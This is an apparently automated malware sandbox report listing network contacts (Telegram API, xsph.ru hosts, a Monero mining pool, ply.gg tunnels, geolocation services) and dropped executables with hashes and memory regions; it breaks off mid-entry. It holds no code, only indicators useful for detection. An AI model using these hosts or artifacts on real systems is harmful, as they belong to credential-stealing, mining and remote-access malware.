NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
PL 51.68.137.186:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
N/A 127.0.0.1:8080 tcp
US 172.241.23.114:443 tcp
US 8.8.8.8:53 114.23.241.172.in-addr.arpa udp
N/A 127.0.0.1:64188 tcp
N/A 127.0.0.1:64330 tcp
DE 5.45.104.89:9676 tcp
DE 46.4.96.24:9993 tcp
US 8.8.8.8:53 24.96.4.46.in-addr.arpa udp
US 8.8.8.8:53 89.104.45.5.in-addr.arpa udp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
DE 101.99.92.189:8080 tcp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 freegeoip.app udp
US 8.8.8.8:53 github.com udp
US 104.21.73.97:443 freegeoip.app tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ipbase.com udp
US 104.21.85.189:443 ipbase.com tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 97.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 189.85.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 id71.internetid.ru udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
RU 95.213.205.83:5655 id71.internetid.ru tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 83.205.213.95.in-addr.arpa udp
RU 77.223.124.212:5655 tcp
US 8.8.8.8:53 212.124.223.77.in-addr.arpa udp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:58963 tcp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 154.216.17.90:80 tcp
N/A 127.0.0.1:58963 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
PL 51.68.137.186:10343 xmr-eu2.nanopool.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
GB 89.35.131.209:80 sanboxland.pro tcp
N/A 127.0.0.1:58963 tcp

Files

memory/1652-0-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp

memory/1652-1-0x00000000007C0000-0x00000000007C8000-memory.dmp

memory/1652-2-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

memory/1652-3-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp

memory/1652-4-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\AppData\Local\Temp\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/2080-37-0x00000213C4AF0000-0x00000213C4CB2000-memory.dmp

memory/2080-38-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

memory/2080-36-0x00000213AA4D0000-0x00000213AA4E8000-memory.dmp

memory/2080-39-0x00000213C52F0000-0x00000213C5818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 5eb39ba3698c99891a6b6eb036cfb653
SHA1 d2f1cdd59669f006a2f1aa9214aeed48bc88c06e
SHA256 e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2
SHA512 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 5404286ec7853897b3ba00adf824d6c1
SHA1 39e543e08b34311b82f6e909e1e67e2f4afec551
SHA256 ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266
SHA512 c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

C:\Users\Admin\AppData\Local\Temp\main\extracted\in.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
SHA1 d5ff596961cce5f03f842cfd8f27dde6f124e3ae
SHA256 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f
SHA512 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

memory/3000-123-0x00007FF772CC0000-0x00007FF773150000-memory.dmp

memory/3000-125-0x00007FF772CC0000-0x00007FF773150000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\vcruntime140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovkwtxfx.4kt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

memory/4436-163-0x00000177FEF30000-0x00000177FEF52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

memory/2080-170-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

MD5 258fbac30b692b9c6dc7037fc8d371f4
SHA1 ec2daa22663bd50b63316f1df0b24bdcf203f2d9
SHA256 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427
SHA512 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4

memory/3676-194-0x0000000000EA0000-0x0000000001110000-memory.dmp

memory/3676-195-0x00000000059E0000-0x0000000005A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\Program Files\Windows Media Player\graph\graph.exe

MD5 7d254439af7b1caaa765420bea7fbd3f
SHA1 7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0
SHA256 d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394
SHA512 c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc

memory/3168-248-0x0000000000400000-0x00000000007BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

MD5 2a78ce9f3872f5e591d643459cabe476
SHA1 9ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA256 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA512 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

MD5 3b8b3018e3283830627249d26305419d
SHA1 40fa5ef5594f9e32810c023aba5b6b8cea82f680
SHA256 258e444e78225f74d47ba4698d49a33e6d1f6ed1f3f710186be426078e2bf1cb
SHA512 2e9a42e53406446b503f150abfa16b994ee34211830d14ccbfbf52d86019dc5cca95c40222e5c6aed910c90988f999560ff972c575f9c207d7834abba6f04aa0

memory/4876-282-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd

MD5 68cecdf24aa2fd011ece466f00ef8450
SHA1 2f859046187e0d5286d0566fac590b1836f6e1b7
SHA256 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770
SHA512 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

MD5 c5ad2e085a9ff5c605572215c40029e1
SHA1 252fe2d36d552bcf8752be2bdd62eb7711d3b2ab
SHA256 47c8723d2034a43fb63f89e2bcd731c99c1c316b238957720c761a0301202e05
SHA512 8878a0f2678908136158f3a6d88393e6831dfe1e64aa82adbb17c26b223381d5ac166dc241bedd554c8dd4e687e9bee624a91fbe3d2976ddfea1d811bf26f6d4

memory/2120-299-0x0000000000F10000-0x000000000102A000-memory.dmp

memory/2120-302-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-301-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-350-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-360-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-358-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-356-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-354-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-353-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-348-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-346-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-344-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-342-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-340-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-338-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-336-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-334-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-332-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-330-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-326-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-324-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-322-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-320-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-316-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-314-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-312-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-310-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-308-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-306-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-328-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-318-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-304-0x0000000005860000-0x0000000005973000-memory.dmp

memory/2120-300-0x0000000005860000-0x000000000597A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

MD5 5950611ed70f90b758610609e2aee8e6
SHA1 798588341c108850c79da309be33495faf2f3246
SHA256 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA512 7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

memory/2120-1493-0x0000000005A20000-0x0000000005A6C000-memory.dmp

memory/2120-1492-0x0000000005A90000-0x0000000005B1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

MD5 f8d528a37993ed91d2496bab9fc734d3
SHA1 4b66b225298f776e21f566b758f3897d20b23cad
SHA256 bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02
SHA512 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a

memory/5096-1501-0x00000000004E0000-0x0000000000C5B000-memory.dmp

memory/3676-1528-0x0000000005CC0000-0x0000000005E20000-memory.dmp

memory/3676-1531-0x0000000006470000-0x0000000006A14000-memory.dmp

memory/3676-1532-0x00000000059C0000-0x00000000059E2000-memory.dmp

memory/4876-1537-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/5904-1543-0x00007FF70BE90000-0x00007FF70C320000-memory.dmp

memory/5904-1541-0x00007FF70BE90000-0x00007FF70C320000-memory.dmp

memory/4876-1545-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

MD5 58f824a8f6a71da8e9a1acc97fc26d52
SHA1 b0e199e6f85626edebbecd13609a011cf953df69
SHA256 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17
SHA512 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461

memory/5768-1564-0x0000000000EC0000-0x0000000001336000-memory.dmp

memory/5768-1565-0x0000000000EC0000-0x0000000001336000-memory.dmp

memory/5768-1572-0x0000000000EC0000-0x0000000001336000-memory.dmp

memory/2280-1576-0x00007FF67FF80000-0x00007FF680410000-memory.dmp

memory/2280-1593-0x00007FF67FF80000-0x00007FF680410000-memory.dmp

memory/5096-1605-0x00000000004E0000-0x0000000000C5B000-memory.dmp

memory/5768-1610-0x0000000000EC0000-0x0000000001336000-memory.dmp

memory/5472-1616-0x0000000002460000-0x0000000002496000-memory.dmp

memory/5472-1617-0x00000000050A0000-0x00000000056C8000-memory.dmp

memory/2120-1618-0x0000000005BD0000-0x0000000005C24000-memory.dmp

memory/5472-1619-0x0000000004E90000-0x0000000004EB2000-memory.dmp

memory/5472-1620-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/5472-1621-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/5472-1635-0x00000000058B0000-0x0000000005C04000-memory.dmp

memory/5472-1644-0x0000000005D50000-0x0000000005D6E000-memory.dmp

memory/5472-1645-0x0000000005D90000-0x0000000005DDC000-memory.dmp

memory/5472-2836-0x0000000070650000-0x000000007069C000-memory.dmp

memory/5472-2835-0x0000000006D30000-0x0000000006D62000-memory.dmp

memory/5472-2846-0x0000000006320000-0x000000000633E000-memory.dmp

memory/5472-2847-0x0000000006F70000-0x0000000007013000-memory.dmp

memory/5472-2848-0x00000000076D0000-0x0000000007D4A000-memory.dmp

memory/5472-2849-0x0000000007080000-0x000000000709A000-memory.dmp

memory/5472-2850-0x00000000070E0000-0x00000000070EA000-memory.dmp

memory/5472-2851-0x0000000007310000-0x00000000073A6000-memory.dmp

memory/5472-2852-0x0000000007280000-0x0000000007291000-memory.dmp

memory/5472-2854-0x00000000072B0000-0x00000000072BE000-memory.dmp

memory/5472-2855-0x00000000072C0000-0x00000000072D4000-memory.dmp

memory/5472-2856-0x00000000073D0000-0x00000000073EA000-memory.dmp

memory/5472-2857-0x0000000007300000-0x0000000007308000-memory.dmp

memory/5768-2861-0x0000000007230000-0x00000000072C2000-memory.dmp

memory/5768-2862-0x00000000074C0000-0x00000000074CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

MD5 3297554944a2e2892096a8fb14c86164
SHA1 4b700666815448a1e0f4f389135fddb3612893ec
SHA256 e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495
SHA512 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25

memory/3960-2872-0x00000000006F0000-0x00000000010CC000-memory.dmp

memory/3960-2873-0x00000000006F0000-0x00000000010CC000-memory.dmp

memory/3960-2874-0x00000000006F0000-0x00000000010CC000-memory.dmp

memory/3960-2880-0x0000000007E90000-0x0000000007F06000-memory.dmp

memory/3960-2879-0x0000000007A80000-0x0000000007A8A000-memory.dmp

memory/3960-2888-0x0000000008BA0000-0x0000000008BBE000-memory.dmp

memory/3960-2889-0x0000000008C70000-0x0000000008CDA000-memory.dmp

memory/3960-2890-0x0000000008CE0000-0x0000000009034000-memory.dmp

memory/3960-2891-0x0000000009080000-0x00000000090CC000-memory.dmp

memory/3960-2893-0x0000000009220000-0x00000000092D2000-memory.dmp

memory/3960-2894-0x0000000009330000-0x0000000009380000-memory.dmp

memory/3960-2896-0x0000000009440000-0x000000000947C000-memory.dmp

memory/3960-2897-0x0000000009400000-0x0000000009421000-memory.dmp

memory/3960-2898-0x000000000A090000-0x000000000A3BE000-memory.dmp

memory/3960-2930-0x000000000A690000-0x000000000A6A2000-memory.dmp

memory/5400-2953-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/3960-2981-0x00000000006F0000-0x00000000010CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

MD5 87d7fffd5ec9e7bc817d31ce77dee415
SHA1 6cc44ccc0438c65cdef248cc6d76fc0d05e79222
SHA256 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628
SHA512 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5

memory/5400-2998-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

MD5 f89267b24ecf471c16add613cec34473
SHA1 c3aad9d69a3848cedb8912e237b06d21e1e9974f
SHA256 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92
SHA512 c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

MD5 53e54ac43786c11e0dde9db8f4eb27ab
SHA1 9c5768d5ee037e90da77f174ef9401970060520e
SHA256 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8
SHA512 cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

MD5 5b39766f490f17925defaee5de2f9861
SHA1 9c89f2951c255117eb3eebcd61dbecf019a4c186
